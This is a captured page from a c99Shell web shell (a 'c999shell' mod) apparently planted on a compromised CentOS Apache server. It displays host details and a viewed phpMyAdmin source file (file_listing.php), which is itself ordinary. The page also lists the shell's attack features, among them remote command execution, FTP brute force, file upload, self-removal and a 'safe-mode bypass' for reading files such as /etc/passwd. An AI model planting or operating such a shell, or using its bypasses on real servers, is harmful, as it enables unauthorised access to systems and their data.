!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     file_listing.php (2.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* $Id: file_listing.php,v 1.4 2006/01/17 17:02:30 cybot_tm Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:
// Functions for listing directories

/**
 * Returns array of filtered file names
 *
 * @param   string  directory to list
 * @param   string  regullar expression to match files
 * @returns array   sorted file list on success, FALSE on failure
 */
function PMA_getDirContent($dir$expression '')
{
    if (
$handle = @opendir($dir)) {
        
$result = array();
        if (
substr($dir, -1) != '/') {
            
$dir .= '/';
        }
        while (
$file = @readdir($handle)) {
            if (
is_file($dir $file) && ($expression == '' || preg_match($expression$file))) {
                
$result[] = $file;
            }
        }
        @
closedir($handle);
        
asort($result);
        return 
$result;
    } else {
        return 
FALSE;
    }
}

/**
 * Returns options of filtered file names
 *
 * @param   string  directory to list
 * @param   string  regullar expression to match files
 * @param   string  currently active choice
 * @returns array   sorted file list on success, FALSE on failure
 */
function PMA_getFileSelectOptions($dir$extensions ''$active '')
{
    
$list PMA_getDirContent($dir$extensions);
    if (
$list === FALSE) {
        return 
FALSE;
    }
    
$result '';
    foreach (
$list as $key => $val) {
        
$result .= '<option value="'htmlspecialchars($val) . '"';
        if (
$val == $active) {
            
$result .= ' selected="selected"';
        }
        
$result .= '>' htmlspecialchars($val) . '</option>' "\n";
    }
    return 
$result;
}

/**
 * Get currently supported decompressions.
 *
 * @returns string | separated list of extensions usable in PMA_getDirContent
 */
function PMA_supportedDecompressions()
{
    global 
$cfg;
    
    
$compressions '';
    
    if (
$cfg['GZipDump'] && @function_exists('gzopen')) {
        if (!empty(
$compressions)) {
            
$compressions .= '|';
        }
        
$compressions .= 'gz';
    }
    if (
$cfg['BZipDump'] && @function_exists('bzopen')) {
        if (!empty(
$compressions)) {
            
$compressions .= '|';
        }
        
$compressions .= 'bz2';
    }
    if (
$cfg['ZipDump'] && @function_exists('gzinflate')) {
        if (!empty(
$compressions)) {
            
$compressions .= '|';
        }
        
$compressions .= 'zip';
    }

    return 
$compressions;
}

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0159 ]--